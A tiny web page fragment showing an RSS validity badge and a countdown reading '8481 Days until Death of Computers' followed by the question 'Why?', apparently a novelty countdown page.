[Valid RSS]

8481 Days
until Death of Computers
Why?